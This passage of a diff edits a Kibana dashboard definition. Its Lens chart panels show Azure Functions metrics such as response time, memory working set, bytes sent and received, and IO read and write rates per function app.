"date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "bde63578-63d7-43ab-ad04-0b810b2f4033", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "bde63578-63d7-43ab-ad04-0b810b2f4033": { - "dataType": "number", - "isBucketed": false, - "label": "Average of azure.functions.http_response_time.avg", - "operationType": "average", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "azure.functions.http_response_time.avg" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.average_memory_working_set.avg" + }, + "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1d2a33f9-47f5-4483-bd25-bf258b7fe434", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "bde63578-63d7-43ab-ad04-0b810b2f4033" - ], - "layerId": "8d0f0cfa-b115-4100-ba7e-1cadee108055", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "ae3ff95a-e30f-4e6d-a3c0-d589a984b82f", - "xAccessor": "234483e9-2403-442e-bb76-d6315e2517af" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The time taken for the app to serve requests.", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "5ef0d281-2eff-415a-ac37-d778985db835", - "w": 24, - "x": 0, - "y": 29 - }, - "panelIndex": "5ef0d281-2eff-415a-ac37-d778985db835", - "title": "Averave Response Time(in seconds)", - "type": "lens", - "version": "8.7.1" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1d2a33f9-47f5-4483-bd25-bf258b7fe434" + ], + "layerId": "750303c4-2d5f-4b67-8018-cba6ccc3e3f8", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f", + "xAccessor": "03e43362-ec04-4c0a-8cdf-0bd29107feee" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The current amount of memory used by the app. ", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-750303c4-2d5f-4b67-8018-cba6ccc3e3f8", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "750303c4-2d5f-4b67-8018-cba6ccc3e3f8": { - "columnOrder": [ - "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f", - "03e43362-ec04-4c0a-8cdf-0bd29107feee", - "1d2a33f9-47f5-4483-bd25-bf258b7fe434" - ], - "columns": { - "03e43362-ec04-4c0a-8cdf-0bd29107feee": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "1d2a33f9-47f5-4483-bd25-bf258b7fe434": { - "dataType": "number", - "isBucketed": false, - "label": "Average of azure.functions.average_memory_working_set.avg", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.average_memory_working_set.avg" - }, - "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "1d2a33f9-47f5-4483-bd25-bf258b7fe434", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The current amount of memory used by the app. ", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "4f589bdd-7bbf-4b5e-88f7-68272155780d", + "w": 24, + "x": 24, + "y": 29 + }, + "panelIndex": "4f589bdd-7bbf-4b5e-88f7-68272155780d", + "title": "Memory Working Set by Function Apps", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "description": "The amount of incoming bandwidth consumed by the app. ", + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "description": "", + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "5e26da41-85b9-4f3d-b666-9b027f19f4c0": { + "columnOrder": [ + "e3e826ac-4145-4caa-97c7-0074740c3bde", + "4d55692b-10e3-4d58-8bc0-2973e9d8bd58", + "f807ce10-f26f-4f0a-a838-2baea3bb5ac2" + ], + "columns": { + "4d55692b-10e3-4d58-8bc0-2973e9d8bd58": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "e3e826ac-4145-4caa-97c7-0074740c3bde": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f807ce10-f26f-4f0a-a838-2baea3bb5ac2", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "1d2a33f9-47f5-4483-bd25-bf258b7fe434" - ], - "layerId": "750303c4-2d5f-4b67-8018-cba6ccc3e3f8", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "6a78eb36-cec6-41f4-bda8-c88c3fdabe7f", - "xAccessor": "03e43362-ec04-4c0a-8cdf-0bd29107feee" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The current amount of memory used by the app. ", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "4f589bdd-7bbf-4b5e-88f7-68272155780d", - "w": 24, - "x": 24, - "y": 29 - }, - "panelIndex": "4f589bdd-7bbf-4b5e-88f7-68272155780d", - "title": "Memory Working Set by Function Apps", - "type": "lens", - "version": "8.7.1" - }, - { - "embeddableConfig": { - "description": "The amount of incoming bandwidth consumed by the app. ", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "96b12503-3f63-4f80-9419-f8d25b7356fc", - "w": 24, - "x": 0, - "y": 44 - }, - "panelIndex": "96b12503-3f63-4f80-9419-f8d25b7356fc", - "panelRefName": "panel_96b12503-3f63-4f80-9419-f8d25b7356fc", - "title": "Top 10 Function Apps by Bytes Received ", - "type": "lens", - "version": "8.7.1" + "f807ce10-f26f-4f0a-a838-2baea3bb5ac2": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.bytes_received.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "azure.functions.bytes_received.total" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset : \"azure.function\" " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "f807ce10-f26f-4f0a-a838-2baea3bb5ac2" + ], + "layerId": "5e26da41-85b9-4f3d-b666-9b027f19f4c0", + "layerType": "data", + "seriesType": "line", + "splitAccessor": "e3e826ac-4145-4caa-97c7-0074740c3bde", + "xAccessor": "4d55692b-10e3-4d58-8bc0-2973e9d8bd58" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The amount of outgoing bandwidth sent by the app. ", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-fa95f5df-3ddf-44ed-88b8-793641935e0a", - "type": "index-pattern" + "title": "Bytes Received", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5e26da41-85b9-4f3d-b666-9b027f19f4c0", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 15, + "i": "96b12503-3f63-4f80-9419-f8d25b7356fc", + "w": 24, + "x": 0, + "y": 44 + }, + "panelIndex": "96b12503-3f63-4f80-9419-f8d25b7356fc", + "title": "Top 10 Function Apps by Bytes Received ", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The amount of outgoing bandwidth sent by the app. ", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-fa95f5df-3ddf-44ed-88b8-793641935e0a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "fa95f5df-3ddf-44ed-88b8-793641935e0a": { + "columnOrder": [ + "a3174d15-f56d-4533-b4e8-2006a55c51d4", + "4a76dd12-cd30-4e95-8b20-015379b31cf4", + "6d32a3d7-e8d2-4061-9d93-eeca1d25d957" + ], + "columns": { + "4a76dd12-cd30-4e95-8b20-015379b31cf4": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "6d32a3d7-e8d2-4061-9d93-eeca1d25d957": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.bytes_sent.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "fa95f5df-3ddf-44ed-88b8-793641935e0a": { - "columnOrder": [ - "a3174d15-f56d-4533-b4e8-2006a55c51d4", - "4a76dd12-cd30-4e95-8b20-015379b31cf4", - "6d32a3d7-e8d2-4061-9d93-eeca1d25d957" - ], - "columns": { - "4a76dd12-cd30-4e95-8b20-015379b31cf4": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "6d32a3d7-e8d2-4061-9d93-eeca1d25d957": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.bytes_sent.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.bytes_sent.total" - }, - "a3174d15-f56d-4533-b4e8-2006a55c51d4": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "6d32a3d7-e8d2-4061-9d93-eeca1d25d957", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.bytes_sent.total" + }, + "a3174d15-f56d-4533-b4e8-2006a55c51d4": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "6d32a3d7-e8d2-4061-9d93-eeca1d25d957", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "6d32a3d7-e8d2-4061-9d93-eeca1d25d957" - ], - "layerId": "fa95f5df-3ddf-44ed-88b8-793641935e0a", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "a3174d15-f56d-4533-b4e8-2006a55c51d4", - "xAccessor": "4a76dd12-cd30-4e95-8b20-015379b31cf4" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The amount of outgoing bandwidth sent by the app. ", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "578f6fe3-6edb-4678-b13c-1e9510f1942b", - "w": 24, - "x": 24, - "y": 44 - }, - "panelIndex": "578f6fe3-6edb-4678-b13c-1e9510f1942b", - "title": "Top 10 Function Apps by Bytes Sent ", - "type": "lens", - "version": "8.7.1" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "6d32a3d7-e8d2-4061-9d93-eeca1d25d957" + ], + "layerId": "fa95f5df-3ddf-44ed-88b8-793641935e0a", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "a3174d15-f56d-4533-b4e8-2006a55c51d4", + "xAccessor": "4a76dd12-cd30-4e95-8b20-015379b31cf4" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The rate at which the app process is reading bytes from I/O operation", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The amount of outgoing bandwidth sent by the app. ", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "578f6fe3-6edb-4678-b13c-1e9510f1942b", + "w": 24, + "x": 24, + "y": 44 + }, + "panelIndex": "578f6fe3-6edb-4678-b13c-1e9510f1942b", + "title": "Top 10 Function Apps by Bytes Sent ", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The rate at which the app process is reading bytes from I/O operation", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "cc027ebf-f1dc-44ef-8907-7b7a407a7fe0": { + "columnOrder": [ + "d3c92de9-3de0-4478-a4a6-432e2c42c0ab", + "10d4106f-6c96-4dc2-8866-3f1fe7e81898", + "755983df-cc70-41bc-88d7-56ae24060492" + ], + "columns": { + "10d4106f-6c96-4dc2-8866-3f1fe7e81898": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "755983df-cc70-41bc-88d7-56ae24060492": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.io_read_bytes_per_second.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "cc027ebf-f1dc-44ef-8907-7b7a407a7fe0": { - "columnOrder": [ - "d3c92de9-3de0-4478-a4a6-432e2c42c0ab", - "10d4106f-6c96-4dc2-8866-3f1fe7e81898", - "755983df-cc70-41bc-88d7-56ae24060492" - ], - "columns": { - "10d4106f-6c96-4dc2-8866-3f1fe7e81898": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "755983df-cc70-41bc-88d7-56ae24060492": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.io_read_bytes_per_second.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.io_read_bytes_per_second.total" - }, - "d3c92de9-3de0-4478-a4a6-432e2c42c0ab": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "755983df-cc70-41bc-88d7-56ae24060492", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.io_read_bytes_per_second.total" + }, + "d3c92de9-3de0-4478-a4a6-432e2c42c0ab": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "755983df-cc70-41bc-88d7-56ae24060492", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "755983df-cc70-41bc-88d7-56ae24060492" - ], - "layerId": "cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", - "layerType": "data", - "position": "top", - "seriesType": "bar", - "showGridlines": false, - "splitAccessor": "d3c92de9-3de0-4478-a4a6-432e2c42c0ab", - "xAccessor": "10d4106f-6c96-4dc2-8866-3f1fe7e81898" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The rate at which the app process is reading bytes from I/O operation", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "f7c59600-cc99-4d51-b8f8-20976818476a", - "w": 24, - "x": 0, - "y": 59 - }, - "panelIndex": "f7c59600-cc99-4d51-b8f8-20976818476a", - "title": "IO Read Bytes Per Second", - "type": "lens", - "version": "8.7.1" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "755983df-cc70-41bc-88d7-56ae24060492" + ], + "layerId": "cc027ebf-f1dc-44ef-8907-7b7a407a7fe0", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "splitAccessor": "d3c92de9-3de0-4478-a4a6-432e2c42c0ab", + "xAccessor": "10d4106f-6c96-4dc2-8866-3f1fe7e81898" + } + ], + "legend": { + "isVisible": true, + "position": "bottom" + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "The rate at which the app process is writing bytes to I/O operations.", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "description": "The rate at which the app process is reading bytes from I/O operation", + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "f7c59600-cc99-4d51-b8f8-20976818476a", + "w": 24, + "x": 0, + "y": 59 + }, + "panelIndex": "f7c59600-cc99-4d51-b8f8-20976818476a", + "title": "IO Read Bytes Per Second", + "type": "lens", + "version": "8.7.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "The rate at which the app process is writing bytes to I/O operations.", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5": { + "columnOrder": [ + "bf621d88-b10b-4d8b-86fc-33034ed0fdc9", + "e2344323-fc84-49dc-9a63-ff7cc0ac618a", + "017dace0-c878-45e7-8d98-bfba5bdade86" + ], + "columns": { + "017dace0-c878-45e7-8d98-bfba5bdade86": { + "dataType": "number", + "isBucketed": false, + "label": "Sum of azure.functions.io_write_bytes_per_second.total", + "operationType": "sum", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5": { - "columnOrder": [ - "bf621d88-b10b-4d8b-86fc-33034ed0fdc9", - "e2344323-fc84-49dc-9a63-ff7cc0ac618a", - "017dace0-c878-45e7-8d98-bfba5bdade86" - ], - "columns": { - "017dace0-c878-45e7-8d98-bfba5bdade86": { - "dataType": "number", - "isBucketed": false, - "label": "Sum of azure.functions.io_write_bytes_per_second.total", - "operationType": "sum", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "azure.functions.io_write_bytes_per_second.total" - }, - "bf621d88-b10b-4d8b-86fc-33034ed0fdc9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of azure.resource.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "017dace0-c878-45e7-8d98-bfba5bdade86", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "azure.resource.name" - }, - "e2344323-fc84-49dc-9a63-ff7cc0ac618a": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {}, - "sampling": 1 - } - } - }, - "textBased": { - "layers": {} - } + }, + "scale": "ratio", + "sourceField": "azure.functions.io_write_bytes_per_second.total" + }, + "bf621d88-b10b-4d8b-86fc-33034ed0fdc9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of azure.resource.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "017dace0-c878-45e7-8d98-bfba5bdade86", + "type": "column" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "017dace0-c878-45e7-8d98-bfba5bdade86" - ], - "layerId": "0efd9b40-6f73-459b-8a6d-22bb9ea9f8f5", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "splitAccessor": "bf621d88-b10b-4d8b-86fc-33034ed0fdc9", - "xAccessor": "e2344323-fc84-49dc-9a63-ff7cc0ac618a" - } - ], - "legend": { - "isVisible": true, - "position": "bottom" - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "azure.resource.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "description": "The rate at which the app process is writing bytes to I/O operations.", - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a", - "w": 24, - "x": 24, - "y": 59 - }, - "panelIndex": "ba3dfc7e-d929-4dac-ba7e-d979652ec83a", - "title": "IO Write Bytes Per Second", - "type": "lens", - "version": "8.7.1" + "e2344323-fc84-49dc-9a63-ff7cc0ac618a": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "textBased": 